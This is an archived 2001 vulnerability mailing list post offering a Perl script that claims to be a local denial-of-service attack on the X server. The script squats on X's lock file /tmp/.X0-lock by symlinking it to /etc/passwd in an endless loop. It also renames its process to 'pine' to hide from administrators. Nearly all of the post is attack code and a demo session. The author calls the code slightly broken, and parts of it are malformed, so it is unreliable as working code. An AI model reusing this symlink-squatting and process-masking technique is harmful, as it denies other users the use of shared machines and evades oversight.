Vulnerability Development mailing list archives
*SERIOUS* local dos in X
From: ac1d-burN <ac1d-burN () 0xfee1dead net>
Date: Mon, 10 Dec 2001 18:50:28 +0100
greetings readers, #!/usr/bin/perl # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING # # advanced lokal denial of service attack against X. # # short demostration: # [acidburn@localhost acidburn]$ ./X-d0S.pl # --- # [root@localhost root]# X & # [1] 8639 # # Fatal server error: # Server is already active for display 0 # If this server is no longer running, remove /tmp/.X0-lock # and start again. ## slightly broken !!! #!/usr/bin/perl $EVIL_FILE="/tmp/.X0-lock"; $0 = "pine" ; # ph00l sysadmin with stealth techniqz system("ln -s /etc/passwd $EVIL_FILE 2&>1"); while(ACIDBURE.IS.ELITE) { if (! -e $EVIL_FILE) { system("ln -s /etc/passwd $EVIL_FILE 2&>1"); } } greets: Sp0aR and rloxley! signed, acid burn -------------------------------------------------------
Current thread:
- *SERIOUS* local dos in X ac1d-burN (Dec 10)
- Re: *SERIOUS* local dos in X 3APA3A (Dec 11)